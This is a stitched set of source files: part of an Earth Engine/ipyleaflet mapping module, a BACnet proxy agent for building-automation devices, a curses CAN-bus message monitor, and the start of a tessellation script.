Args:
year (int, optional): The year of Planet global mosaic, must be >=2016. Defaults to 2016.
month (int, optional): The month of Planet global mosaic, must be 1-12. Defaults to 1.
name (str, optional): The layer name to use. Defaults to None.
api_key (str, optional): The Planet API key. Defaults to None.
token_name (str, optional): The environment variable name of the API key. Defaults to "PLANET_API_KEY".
"""
layer = planet_tile_by_month(year, month, name, api_key, token_name)
self.add_layer(layer)
def add_planet_by_quarter(
self, year=2016, quarter=1, name=None, api_key=None, token_name="PLANET_API_KEY"
):
"""Adds a Planet global mosaic by quarter to the map. To get a Planet API key, see https://developers.planet.com/quickstart/apis
Args:
year (int, optional): The year of Planet global mosaic, must be >=2016. Defaults to 2016.
quarter (int, optional): The quarter of Planet global mosaic, must be 1-4. Defaults to 1.
name (str, optional): The layer name to use. Defaults to None.
api_key (str, optional): The Planet API key. Defaults to None.
token_name (str, optional): The environment variable name of the API key. Defaults to "PLANET_API_KEY".
"""
layer = planet_tile_by_quarter(year, quarter, name, api_key, token_name)
self.add_layer(layer)
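# Usage sketch (illustrative): both helpers require a Planet API key, either
# passed as api_key or exposed through the PLANET_API_KEY environment variable.
#
#   m = Map()
#   m.add_planet_by_month(year=2020, month=8)
#   m.add_planet_by_quarter(year=2020, quarter=3)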
# The functions below are outside the Map class.
def ee_tile_layer(
ee_object, vis_params={}, name="Layer untitled", shown=True, opacity=1.0
):
"""Converts and Earth Engine layer to ipyleaflet TileLayer.
Args:
ee_object (Collection|Feature|Image|MapId): The object to add to the map.
vis_params (dict, optional): The visualization parameters. Defaults to {}.
name (str, optional): The name of the layer. Defaults to 'Layer untitled'.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
opacity (float, optional): The layer's opacity represented as a number between 0 and 1. Defaults to 1.
"""
image = None
if (
not isinstance(ee_object, ee.Image)
and not isinstance(ee_object, ee.ImageCollection)
and not isinstance(ee_object, ee.FeatureCollection)
and not isinstance(ee_object, ee.Feature)
and not isinstance(ee_object, ee.Geometry)
):
err_str = "\n\nThe image argument in 'addLayer' function must be an instance of one of ee.Image, ee.Geometry, ee.Feature or ee.FeatureCollection."
raise AttributeError(err_str)
if (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(ee_object, ee.featurecollection.FeatureCollection)
):
features = ee.FeatureCollection(ee_object)
width = 2
if "width" in vis_params:
width = vis_params["width"]
color = "000000"
if "color" in vis_params:
color = vis_params["color"]
image_fill = features.style(**{"fillColor": color}).updateMask(
ee.Image.constant(0.5)
)
image_outline = features.style(
**{"color": color, "fillColor": "00000000", "width": width}
)
image = image_fill.blend(image_outline)
elif isinstance(ee_object, ee.image.Image):
image = ee_object
elif isinstance(ee_object, ee.imagecollection.ImageCollection):
image = ee_object.mosaic()
map_id_dict = ee.Image(image).getMapId(vis_params)
tile_layer = ipyleaflet.TileLayer(
url=map_id_dict["tile_fetcher"].url_format,
attribution="Google Earth Engine",
name=name,
opacity=opacity,
visible=shown,
)
return tile_layer
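# Usage sketch (illustrative): the returned ipyleaflet.TileLayer can be added to
# any ipyleaflet map. The DEM asset ID and vis params are assumptions.
#
#   dem = ee.Image("USGS/SRTMGL1_003")
#   layer = ee_tile_layer(dem, {"min": 0, "max": 4000}, name="DEM")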
def linked_maps(
rows=2,
cols=2,
height="400px",
ee_objects=[],
vis_params=[],
labels=[],
label_position="topright",
**kwargs,
):
"""Create linked maps of Earth Engine data layers.
Args:
rows (int, optional): The number of rows of maps to create. Defaults to 2.
cols (int, optional): The number of columns of maps to create. Defaults to 2.
height (str, optional): The height of each map in pixels. Defaults to "400px".
ee_objects (list, optional): The list of Earth Engine objects to use for each map. Defaults to [].
vis_params (list, optional): The list of visualization parameters to use for each map. Defaults to [].
labels (list, optional): The list of labels to show on the map. Defaults to [].
label_position (str, optional): The position of the label, can be [topleft, topright, bottomleft, bottomright]. Defaults to "topright".
Raises:
ValueError: If the length of ee_objects is not equal to rows*cols.
ValueError: If the length of vis_params is not equal to rows*cols.
ValueError: If the length of labels is not equal to rows*cols.
Returns:
ipywidget: A GridspecLayout widget.
"""
grid = widgets.GridspecLayout(rows, cols, grid_gap="0px")
count = rows * cols
maps = []
if len(ee_objects) > 0:
if len(ee_objects) == 1:
ee_objects = ee_objects * count
elif len(ee_objects) < count:
raise ValueError(f"The length of ee_objects must be equal to {count}.")
if len(vis_params) > 0:
if len(vis_params) == 1:
vis_params = vis_params * count
elif len(vis_params) < count:
raise ValueError(f"The length of vis_params must be equal to {count}.")
if len(labels) > 0:
if len(labels) == 1:
labels = labels * count
elif len(labels) < count:
raise ValueError(f"The length of labels must be equal to {count}.")
for i in range(rows):
for j in range(cols):
index = i * cols + j  # row-major index into the ee_objects/vis_params/labels lists
m = Map(
height=height,
lite_mode=True,
add_google_map=False,
layout=widgets.Layout(margin="0px", padding="0px"),
**kwargs,
)
if len(ee_objects) > 0:
m.addLayer(ee_objects[index], vis_params[index], labels[index])
if len(labels) > 0:
label = widgets.Label(
labels[index], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
control = ipyleaflet.WidgetControl(
widget=label, position=label_position
)
m.add_control(control)
maps.append(m)
widgets.jslink((maps[0], "center"), (m, "center"))
widgets.jslink((maps[0], "zoom"), (m, "zoom"))
output = widgets.Output()
with output:
display(m)
grid[i, j] = output
return grid
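# Usage sketch (illustrative): a single object/vis_params/label is broadcast to
# every panel. The asset ID and vis params are assumptions.
#
#   dem = ee.Image("USGS/SRTMGL1_003")
#   grid = linked_maps(rows=1, cols=2, ee_objects=[dem],
#                      vis_params=[{"min": 0, "max": 4000}], labels=["SRTM DEM"])
#   grid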
def ts_inspector(
layers_dict=None,
left_name=None,
right_name=None,
width="120px",
center=[40, -100],
zoom=4,
**kwargs,
):
add_zoom = True
add_fullscreen = True
if "data_ctrl" not in kwargs:
kwargs["data_ctrl"] = False
if "toolbar_ctrl" not in kwargs:
kwargs["toolbar_ctrl"] = False
if "draw_ctrl" not in kwargs:
kwargs["draw_ctrl"] = False
if "measure_ctrl" not in kwargs:
kwargs["measure_ctrl"] = False
if "zoom_ctrl" not in kwargs:
kwargs["zoom_ctrl"] = False
else:
add_zoom = kwargs["zoom_ctrl"]
if "fullscreen_ctrl" not in kwargs:
kwargs["fullscreen_ctrl"] = False
else:
add_fullscreen = kwargs["fullscreen_ctrl"]
if layers_dict is None:
layers_dict = {}
keys = dict(basemap_tiles).keys()
for key in keys:
if isinstance(basemap_tiles[key], ipyleaflet.WMSLayer):
pass
else:
layers_dict[key] = basemap_tiles[key]
keys = list(layers_dict.keys())
if left_name is None:
left_name = keys[0]
if right_name is None:
right_name = keys[-1]
left_layer = layers_dict[left_name]
right_layer = layers_dict[right_name]
m = Map(center=center, zoom=zoom, google_map=None, **kwargs)
control = ipyleaflet.SplitMapControl(left_layer=left_layer, right_layer=right_layer)
m.add_control(control)
left_dropdown = widgets.Dropdown(
options=keys, value=left_name, layout=widgets.Layout(width=width)
)
left_control = ipyleaflet.WidgetControl(widget=left_dropdown, position="topleft")
m.add_control(left_control)
right_dropdown = widgets.Dropdown(
options=keys, value=right_name, layout=widgets.Layout(width=width)
)
right_control = ipyleaflet.WidgetControl(widget=right_dropdown, position="topright")
m.add_control(right_control)
if add_zoom:
m.add_control(ipyleaflet.ZoomControl())
if add_fullscreen:
m.add_control(ipyleaflet.FullScreenControl())
split_control = None
for ctrl in m.controls:
if isinstance(ctrl, ipyleaflet.SplitMapControl):
split_control = ctrl
break
def left_change(change):
split_control.left_layer.url = layers_dict[left_dropdown.value].url
left_dropdown.observe(left_change, "value")
def right_change(change):
split_control.right_layer.url = layers_dict[right_dropdown.value].url
right_dropdown.observe(right_change, "value")
return m
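# Usage sketch (illustrative): with layers_dict=None the split-map dropdowns are
# populated from basemap_tiles; the basemap names below are assumptions.
#
#   m = ts_inspector(left_name="OpenTopoMap", right_name="Esri.WorldImagery")
#   m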
|
agent.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization
# that has cooperated in the development of these materials, makes
# any warranty, express or implied, or assumes any legal liability
# or responsibility for the accuracy, completeness, or usefulness of
# any information, apparatus, product, software, or process disclosed,
# or represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does
# not necessarily constitute or imply its endorsement, recommendation,
# or favoring by the United States Government or any agency thereof,
# or Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
import logging
import sys
import sqlite3
from volttron.platform.vip.agent import Agent, Core, RPC
from volttron.platform.async import AsyncCall
from volttron.platform.agent import utils
utils.setup_logging()
_log = logging.getLogger(__name__)
bacnet_logger = logging.getLogger("bacpypes")
bacnet_logger.setLevel(logging.WARNING)
__version__ = '0.1'
import os.path
import errno
from zmq.utils import jsonapi
from collections import defaultdict
from bacpypes.core import run, stop
from Queue import Queue, Empty
from bemoss_lib.utils.find_own_ip import getIPs
from bacpypes.task import RecurringTask
from bacpypes.apdu import ConfirmedRequestSequence, WhoIsRequest
import bacpypes.core
import threading
# Tweaks to BACpypes to make it play nice with Gevent.
bacpypes.core.enable_sleeping()
bacpypes.core.SPIN = 0.1
from bacpypes.errors import DecodingError
from bacpypes.pdu import Address, GlobalBroadcast
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.object import get_datatype
from bacpypes.apdu import (ReadPropertyRequest,
WritePropertyRequest, IAmRequest,
Error,
AbortPDU,
ReadPropertyACK,
SimpleAckPDU,
ReadPropertyMultipleRequest,
ReadPropertyMultipleACK,
PropertyReference,
ReadAccessSpecification,
encode_max_apdu_response)
from bacpypes.primitivedata import Null, Atomic, Enumerated, Integer, Unsigned, Real
from bacpypes.constructeddata import Array, Any, Choice
from bacpypes.basetypes import ServicesSupported
from bacpypes.task import TaskManager
from gevent.event import AsyncResult
path = os.path.dirname(os.path.abspath(__file__))
configFile = os.path.join(path, "bacnet_example_config.csv")
#Make sure the TaskManager singleton exists...
task_manager = TaskManager()
#IO callback
class IOCB:
def __init__(self, request, asynccall):
# requests and responses
self.ioRequest = request
self.ioResult = AsyncResult()
self.ioCall = asynccall
def set(self, value):
self.ioCall.send(None, self.ioResult.set, value)
def set_exception(self, exception):
self.ioCall.send(None, self.ioResult.set_exception, exception)
class BACnet_application(BIPSimpleApplication, RecurringTask):
def __init__(self, *args):
BIPSimpleApplication.__init__(self, *args)
RecurringTask.__init__(self, 250)
self.request_queue = Queue()
self._request = None
self.found_address=list()
# self.found_deviceidentifier=list()
# assigning invoke identifiers
self.nextInvokeID = 1
# keep track of requests to line up responses
self.iocb = {}
self.install_task()
def process_task(self):
while True:
try:
iocb = self.request_queue.get(False)
except Empty:
break
self.handle_request(iocb)
def submit_request(self, iocb):
self.request_queue.put(iocb)
def get_next_invoke_id(self, addr):
"""Called to get an unused invoke ID."""
initialID = self.nextInvokeID
while 1:
invokeID = self.nextInvokeID
self.nextInvokeID = (self.nextInvokeID + 1) % 256
# see if we've checked for them all
if initialID == self.nextInvokeID:
raise RuntimeError("no available invoke ID")
# see if this one is used
if (addr, invokeID) not in self.iocb:
break
return invokeID
def handle_request(self, iocb):
apdu = iocb.ioRequest
if isinstance(apdu, ConfirmedRequestSequence):
# assign an invoke identifier
apdu.apduInvokeID = self.get_next_invoke_id(apdu.pduDestination)
# build a key to reference the IOCB when the response comes back
invoke_key = (apdu.pduDestination, apdu.apduInvokeID)
# keep track of the request
self.iocb[invoke_key] = iocb
try:
self.request(apdu)
except StandardError as e:
iocb.set_exception(e)
def confirmation(self, apdu):
# build a key to look for the IOCB
invoke_key = (apdu.pduSource, apdu.apduInvokeID)
# find the request
iocb = self.iocb.get(invoke_key, None)
if iocb is None:
iocb.set_exception(RuntimeError("no matching request for confirmation"))
return
del self.iocb[invoke_key]
if isinstance(apdu, AbortPDU):
iocb.set_exception(RuntimeError("Device communication aborted: " + str(apdu)))
return
if isinstance(apdu, Error):
iocb.set_exception(RuntimeError("Error during device communication: " + str(apdu)))
return
elif (isinstance(iocb.ioRequest, ReadPropertyRequest) and
isinstance(apdu, ReadPropertyACK)):
# find the datatype
datatype = get_datatype(apdu.objectIdentifier[0], apdu.propertyIdentifier)
if not datatype:
iocb.set_exception(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (apdu.propertyArrayIndex is not None):
if apdu.propertyArrayIndex == 0:
value = apdu.propertyValue.cast_out(Unsigned)
else:
value = apdu.propertyValue.cast_out(datatype.subtype)
else:
value = apdu.propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
iocb.set(value)
elif (isinstance(iocb.ioRequest, WritePropertyRequest) and
isinstance(apdu, SimpleAckPDU)):
iocb.set(apdu)
return
elif (isinstance(iocb.ioRequest, ReadPropertyMultipleRequest) and
isinstance(apdu, ReadPropertyMultipleACK)):
result_dict = {}
for result in apdu.listOfReadAccessResults:
# here is the object identifier
objectIdentifier = result.objectIdentifier
# now come the property values per object
for element in result.listOfResults:
# get the property and array index
propertyIdentifier = element.propertyIdentifier
propertyArrayIndex = element.propertyArrayIndex
# here is the read result
readResult = element.readResult
# check for an error
if readResult.propertyAccessError is not None:
error_obj = readResult.propertyAccessError
msg = 'ERROR DURING SCRAPE (Class: {0} Code: {1})'
print msg.format(error_obj.errorClass, error_obj.errorCode)
else:
# here is the value
propertyValue = readResult.propertyValue
# find the datatype
datatype = get_datatype(objectIdentifier[0], propertyIdentifier)
if not datatype:
iocb.set_exception(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (propertyArrayIndex is not None):
if propertyArrayIndex == 0:
value = propertyValue.cast_out(Unsigned)
else:
value = propertyValue.cast_out(datatype.subtype)
else:
value = propertyValue.cast_out(datatype)
if type(value)==int:
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
if issubclass(datatype, Array):
if issubclass(datatype.subtype, Choice):
new_value = []
for item in value.value[1:]:
result = item.dict_contents().values()
if result[0] != ():
new_value.append(result[0])
else:
new_value.append(None)
value = new_value
else:
pass
#value = [x.cast_out(datatype.subtype) for x in value.value[1:]]
result_dict[objectIdentifier[0], objectIdentifier[1], propertyIdentifier] = value
iocb.set(result_dict)
else:
iocb.set_exception(TypeError('Unsupported Request Type'))
def indication(self,apdu):
self.apdu = apdu
device_type, device_instance = apdu.iAmDeviceIdentifier
self.device_type=device_type
self.device_instance=device_instance
self.release=False
self.update=True
self.updator()
def updator(self):
if self.update==True:
apdu=self.apdu
Remotestation=str(apdu.pduSource)
StationIdentifier=self.device_instance
addresslist=(Remotestation, StationIdentifier)
try:
self.found_address.append(addresslist)
#self.found_deviceidentifier.append(StationIdentifier)
except Exception as e:
print e
if self.release==True:
return (self.found_address)
def bacnet_proxy_agent(config_path, **kwargs):
config = utils.load_config(config_path)
vip_identity = config.get("vip_identity", "platform.bacnet_proxy")
#pop off the uuid based identity
ips = getIPs()
print "found local ip as ", ips
device_address = ips[0] + "/24"
kwargs.pop('identity', None)
max_apdu_len=config.get("max_apdu_length",1024)
seg_supported=config.get("segmentation_supported","segmentedBoth")
obj_id=config.get("object_id",599)
obj_name=config.get("object_name","Volttron BACnet driver")
ven_id=config.get("vendor_id",15)
return BACnetProxyAgent(device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id,
heartbeat_autostart=True, identity=vip_identity,**kwargs)
class BACnetProxyAgent(Agent):
'''This agent creates a virtual bacnet device that is used by
the bacnet driver interface to communicate with devices.
'''
def __init__(self, device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id,
**kwargs):
super(BACnetProxyAgent, self).__init__(**kwargs)
self.async_call = AsyncCall()
self.setup_device(device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id)
def setup_device(self, address,
max_apdu_len=1024,
seg_supported='segmentedBoth',
obj_id=599,
obj_name='sMap BACnet driver',
ven_id=15):
_log.info('seg_supported '+str(seg_supported))
_log.info('max_apdu_len '+str(max_apdu_len))
_log.info('obj_id '+str(obj_id))
_log.info('obj_name '+str(obj_name))
_log.info('ven_id '+str(ven_id))
#Check to see if they gave a valid apdu length.
if encode_max_apdu_response(max_apdu_len) is None:
raise ValueError('Invalid max_apdu_len: {} Valid options are 50, 128, 206, 480, 1024, and 1476'.format(max_apdu_len))
this_device = LocalDeviceObject(
objectName=obj_name,
objectIdentifier=obj_id,
maxApduLengthAccepted=max_apdu_len,
segmentationSupported=seg_supported,
vendorIdentifier=ven_id,
)
# build a bit string that knows about the bit names and leave it empty. We respond to NOTHING.
pss = ServicesSupported()
# set the property value to be just the bits
this_device.protocolServicesSupported = pss.value
self.this_application = BACnet_application(this_device, address)
server_thread = threading.Thread(target=bacpypes.core.run)
# exit the BACnet App thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def broadcast(self):
try:
request = WhoIsRequest()
request.pduDestination = GlobalBroadcast()
# Send the WhoIs broadcast once; I-Am responses are collected
# asynchronously by indication() into found_address.
self.this_application.request(request)
self.this_application.release = True
self.this_application.update = False
addresslist = self.this_application.found_address
addresslist=list(set(addresslist))
return addresslist
except Exception as e:
_log.exception("an error has occurred during bacnet discovery: %s", e)
return []
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def ping_device(self, target_address, device_id):
"""Ping a device with a whois to potentially setup routing."""
_log.debug("Pinging "+target_address)
request = WhoIsRequest()
request.deviceInstanceRangeLowLimit = device_id
request.deviceInstanceRangeHighLimit = device_id
request.pduDestination = GlobalBroadcast()
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def write_property(self, target_address, value, object_type, instance_number, property_name, priority=None, index=None):
"""Write to a property."""
request = WritePropertyRequest(
objectIdentifier=(object_type, instance_number),
propertyIdentifier=property_name)
datatype = get_datatype(object_type, property_name)
if (value is None or value == 'null'):
bac_value = Null()
elif issubclass(datatype, Atomic):
if datatype is Integer:
value = int(value)
elif datatype is Real:
value = float(value)
elif datatype is Unsigned:
value = int(value)
bac_value = datatype(value)
elif issubclass(datatype, Array) and (index is not None):
if index == 0:
bac_value = Integer(value)
elif issubclass(datatype.subtype, Atomic):
bac_value = datatype.subtype(value)
elif not isinstance(value, datatype.subtype):
raise TypeError("invalid result datatype, expecting %s" % (datatype.subtype.__name__,))
elif not isinstance(value, datatype):
raise TypeError("invalid result datatype, expecting %s" % (datatype.__name__,))
request.propertyValue = Any()
request.propertyValue.cast_in(bac_value)
request.pduDestination = Address(target_address)
#Optional index
if index is not None:
request.propertyArrayIndex = index
#Optional priority
if priority is not None:
request.priority = priority
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
result = iocb.ioResult.wait()
if isinstance(result, SimpleAckPDU):
return value
raise RuntimeError("Failed to set value: " + str(result))
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def simple_read(self, target_address, obj_inst, propertylist, obj_type= "device", index=0):
try:
reverse_point_map = {}
result_dict = []
read_access_spec_list = []
count = 0
prop_ref_list = []
for prop in propertylist:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
count += 1
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
if read_access_spec_list:
if count==1:
_log.debug("Requesting {property} properties from {target}".format(property=prop,
target=target_address))
else:
_log.debug("Requesting {count} properties from {target}".format(count=count,
target=target_address))
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = Address(target_address)
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
print "bacnet request sent"
bacnet_results=tuple
bacnet_results = iocb.ioResult.get(35)
print"bacnet data fetched"
for prop_tuple, value in bacnet_results.iteritems():
result_dict.append(value)
print result_dict
return result_dict
except Exception as e:
print e
return None
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def read_properties(self, target_address, point_map, max_per_request=None):
"""Read a set of points and return the results"""
#Set max_per_request really high if not set.
if max_per_request is None:
max_per_request = 1000000
_log.debug("Reading {count} points on {target}, max per scrape: {max}".format(count=len(point_map),
target=target_address,
max=max_per_request))
#This will be used to get the results mapped
# back on the the names
reverse_point_map = {}
#TODO Support reading an index of an Array.
#Used to group properties together for the request.
object_property_map = defaultdict(list)
for name, properties in point_map.iteritems():
object_type, instance_number, property_name = properties
reverse_point_map[object_type,
instance_number,
property_name] = name
object_property_map[object_type,
instance_number].append(property_name)
result_dict={}
finished = False
while not finished:
read_access_spec_list = []
count = 0
for _ in xrange(max_per_request):
try:
obj_data, properties = object_property_map.popitem()
except KeyError:
finished = True
break
obj_type, obj_inst = obj_data
prop_ref_list = []
for prop in properties:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
count += 1
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
if read_access_spec_list:
_log.debug("Requesting {count} properties from {target}".format(count=count,
target=target_address))
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = Address(target_address)
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
bacnet_results = iocb.ioResult.get(10)
_log.debug("Received read response from {target}".format(count=count,
target=target_address))
for prop_tuple, value in bacnet_results.iteritems():
name = reverse_point_map[prop_tuple]
result_dict[name] = value
return result_dict
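# Usage sketch (illustrative only): read_properties() expects point_map to map a
# caller-chosen point name onto an (object_type, instance_number, property_name)
# tuple, e.g.
#
#   point_map = {
#       "ZoneTemp":  ("analogInput", 3000107, "presentValue"),
#       "FanStatus": ("binaryInput", 3000114, "presentValue"),
#   }
#
# The names and instance numbers above are hypothetical; the returned dict is
# keyed by the same point names.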
def main(argv=sys.argv):
'''Main method called to start the agent.'''
utils.vip_main(bacnet_proxy_agent)
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
|
canmonitor.py
|
#!/usr/bin/env python3
import argparse
import curses
import sys
import threading
import traceback
from .source_handler import CandumpHandler, InvalidFrame, SerialHandler
should_redraw = threading.Event()
stop_reading = threading.Event()
can_messages = {}
can_messages_lock = threading.Lock()
thread_exception = None
def reading_loop(source_handler, blacklist):
"""Background thread for reading."""
try:
while not stop_reading.is_set():
try:
frame_id, data = source_handler.get_message()
except InvalidFrame:
continue
except EOFError:
break
if frame_id in blacklist:
continue
# Add the frame to the can_messages dict and tell the main thread to refresh its content
with can_messages_lock:
can_messages[frame_id] = data
should_redraw.set()
stop_reading.wait()
except:
if not stop_reading.is_set():
# Only log exception if we were not going to stop the thread
# When quitting, the main thread calls close() on the serial device
# and read() may throw an exception. We don't want to display it as
# we're stopping the script anyway
global thread_exception
thread_exception = sys.exc_info()
def init_window(stdscr):
"""Init a window filling the entire screen with a border around it."""
stdscr.clear()
stdscr.refresh()
max_y, max_x = stdscr.getmaxyx()
root_window = stdscr.derwin(max_y, max_x, 0, 0)
root_window.box()
return root_window
def format_data_hex(data):
"""Convert the bytes array to an hex representation."""
# Bytes are separated by spaces.
return ' '.join('%02X' % byte for byte in data)
def format_data_ascii(data):
"""Try to make an ASCII representation of the bytes.
Non-printable characters are replaced by '?', except the null character, which
is replaced by '.'.
"""
msg_str = ''
for byte in data:
char = chr(byte)
if char == '\0':
msg_str = msg_str + '.'
elif ord(char) < 32 or ord(char) > 126:
msg_str = msg_str + '?'
else:
msg_str = msg_str + char
return msg_str
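# Worked example (assumed input bytes, outputs derived from the helpers above):
#   format_data_hex(b'\x01\xa0\xff')  -> '01 A0 FF'
#   format_data_ascii(b'A\x00\x7f')   -> 'A.?'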
def main(stdscr, reading_thread):
"""Main function displaying the UI."""
# Don't print typed character
curses.noecho()
curses.cbreak()
curses.curs_set(0) # set cursor state to invisible
# Set getch() to non-blocking
stdscr.nodelay(True)
win = init_window(stdscr)
while True:
# should_redraw is set by the serial thread when new data is available
if should_redraw.wait(timeout=0.05): # Timeout needed in order to react to user input
max_y, max_x = win.getmaxyx()
column_width = 50
id_column_start = 2
bytes_column_start = 13
text_column_start = 38
# Compute row/column counts according to the window size and borders
row_start = 3
lines_per_column = max_y - (1 + row_start)
num_columns = (max_x - 2) // column_width
# Setting up column headers
for i in range(0, num_columns):
win.addstr(1, id_column_start + i * column_width, 'ID')
win.addstr(1, bytes_column_start + i * column_width, 'Bytes')
win.addstr(1, text_column_start + i * column_width, 'Text')
win.addstr(3, id_column_start, "Beta By Justin Greer - Press 'q' to quit")
row = row_start + 2 # The first column starts a bit lower to make space for the 'press q to quit' message
current_column = 0
# Make sure we don't read the can_messages dict while it's being written to in the reading thread
with can_messages_lock:
for frame_id in sorted(can_messages.keys()):
msg = can_messages[frame_id]
msg_bytes = format_data_hex(msg)
msg_str = format_data_ascii(msg)
# print frame ID in decimal and hex
win.addstr(row, id_column_start + current_column * column_width, '%s' % str(frame_id).ljust(5))
#win.addstr(row, id_column_start + 5 + current_column * column_width, '%X'.ljust(5) % frame_id)
# print frame bytes
win.addstr(row, bytes_column_start + current_column * column_width, msg_bytes.ljust(23))
# print frame text
win.addstr(row, text_column_start + current_column * column_width, msg_str.ljust(8))
row = row + 1
if row >= lines_per_column + row_start:
# column full, switch to the next one
row = row_start
current_column = current_column + 1
if current_column >= num_columns:
break
win.refresh()
should_redraw.clear()
c = stdscr.getch()
if c == ord('q') or not reading_thread.is_alive():
break
elif c == curses.KEY_RESIZE:
win = init_window(stdscr)
should_redraw.set()
def parse_ints(string_list):
int_set = set()
for line in string_list:
try:
int_set.add(int(line, 0))
except ValueError:
continue
return int_set
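# Example (hypothetical blacklist entries): the base is auto-detected by int(x, 0),
# and entries that are not integers are silently skipped:
#   parse_ints(["0x1A", "10", "junk"]) -> {26, 10}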
def run():
parser = argparse.ArgumentParser(description='Process CAN data from a serial device or from a file.')
parser.add_argument('serial_device', type=str, nargs='?')
parser.add_argument('baud_rate', type=int, default=115200, nargs='?',
help='Serial baud rate in bps (default: 115200)')
parser.add_argument('-f', '--candump-file', metavar='CANDUMP_FILE', help="File (of 'candump' format) to read from")
parser.add_argument('-s', '--candump-speed', type=float, metavar='CANDUMP_SPEED', help="Speed scale of file read")
parser.add_argument('--blacklist', '-b', nargs='+', metavar='BLACKLIST', help="Ids that must be ignored")
parser.add_argument(
'--blacklist-file',
'-bf',
metavar='BLACKLIST_FILE',
help="File containing ids that must be ignored",
)
args = parser.parse_args()
# checks arguments
if not args.serial_device and not args.candump_file:
print("Please specify serial device or file name")
print()
parser.print_help()
return
if args.serial_device and args.candump_file:
print("You cannot specify a serial device AND a file name")
print()
parser.print_help()
return
# --blacklist-file prevails over --blacklist
if args.blacklist_file:
with open(args.blacklist_file) as f_obj:
blacklist = parse_ints(f_obj)
elif args.blacklist:
blacklist = parse_ints(args.blacklist)
else:
blacklist = set()
if args.serial_device:
source_handler = SerialHandler(args.serial_device, baudrate=args.baud_rate)
elif args.candump_file:
source_handler = CandumpHandler(args.candump_file, args.candump_speed)
reading_thread = None
try:
# If reading from a serial device, it will be opened with timeout=0 (non-blocking read())
source_handler.open()
# Start the reading background thread
reading_thread = threading.Thread(target=reading_loop, args=(source_handler, blacklist,))
reading_thread.start()
# Make sure to draw the UI the first time even if no data has been read
should_redraw.set()
# Start the main loop
curses.wrapper(main, reading_thread)
finally:
# Cleanly stop reading thread before exiting
if reading_thread:
stop_reading.set()
if source_handler:
source_handler.close()
reading_thread.join()
# If the thread returned an exception, print it
if thread_exception:
traceback.print_exception(*thread_exception)
sys.stderr.flush()
if __name__ == '__main__':
run()
|
20_tessellation.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
